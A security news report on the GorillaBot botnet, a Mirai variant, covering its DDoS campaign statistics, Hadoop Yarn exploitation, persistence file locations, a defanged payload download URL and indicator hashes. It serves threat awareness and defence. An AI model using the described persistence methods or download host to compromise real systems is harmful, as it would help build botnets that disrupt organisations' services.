A DDoS attack is a cyber attack aimed at disrupting the normal functioning of a targeted server, service, or network by flooding it with excessive internet traffic.
While this is achieved via a network of compromised devices, known as a botnet, which sends numerous requests to the target, effectively blocking its bandwidth and resources.
NSFocus analysts recently identified a botnet that emerged as king for DDoS attacks with 300,000+ commands and it’s dubbed “GorillaBot.”
Leveraging AI for enhanced security => Free Webinar
GorillaBot Emerged As King For DDoS
In September 2024, the Gorilla Botnet, a modified version of the Mirai malware, launched an unprecedented cyber-attack campaign.
Over a 24-day period, it issued more than 300,000 DDoS attack commands that targeted 113 countries along with the following countries that are most affected:-
- China (20%)
- The United States (19%)
- Canada (16%)
- Germany (6%)
This botnet supports most of the major CPU architectures like ARM, MIPS, x86_64, and x86. Besides this, it utilized several attack methods “UDP Flood (41%),” “ACK BYPASS Flood (24%),” and “VSE Flood (12%).”
Gorilla Botnet targeted various sectors like ‘universities,’ ‘government websites,’ ‘telecommunications,’ ‘banks,’ and ‘gaming platforms.’
It employed encryption algorithms associated with the “KekSec group” to hide crucial information and implemented multiple techniques to maintain long-term control over IoT devices and cloud hosts.
The infrastructure of the botnet has five built-in C&C servers, randomly selected for connections. Its arsenal comprised ’19 different attack vectors,’ this illustrates a sophisticated approach, NSFocus said.
This emerging threat showcased advanced counter-detection capabilities and also highlighted the “evolving landscape” of cyber threats.
It exploits the ‘Hadoop Yarn RPC’ unauthorized access vulnerability through a function called “yarn_init,” potentially granting attackers elevated privileges.
GorillaBot creates multiple system files and scripts for persistence, and here below we have mentioned them:-
- “A ‘custom.service’ file in /etc/systemd/system/ for automatic startup.”
- “Modifications to /etc/inittab, /etc/profile.”
- “/boot/bootcmd for execution on system boot or user login.”
- “A ‘mybinary’ script in /etc/init.d/ with a soft link in /etc/rc.d/rc.local or /etc/rc.conf.”
These mechanisms ensure the automatic download and execution of a malicious script named ‘lol.sh’ from http[:]//pen.gorillafirewall.su/.
The malware also incorporates “anti-honeypot measures,” through which it checks for the existence of the “/proc filesystem” to detect potential security traps.
GorillaBot’s use of specific encryption methods, the ‘lol.sh’ script name, and certain code signatures suggest a possible connection to “KekSec.”
IOCs
- 276adc6a55f13a229a5ff482e49f3a0b
- 63cbfc2c626da269c67506636bb1ea30
- 7f134c477f307652bb884cafe98b0bf2
- 3a3be84df2435623132efd1cd9467b17
- 03a59780b4c5a3c990d0031c959bf7cc
- 5b37be51ee3d41c07d02795a853b8577
- 15f6a606ab74b66e1f7e4a01b4a6b2d7
Free Webinar on How to Protect Small Businesses Against Advanced Cyberthreats -> Free Webinar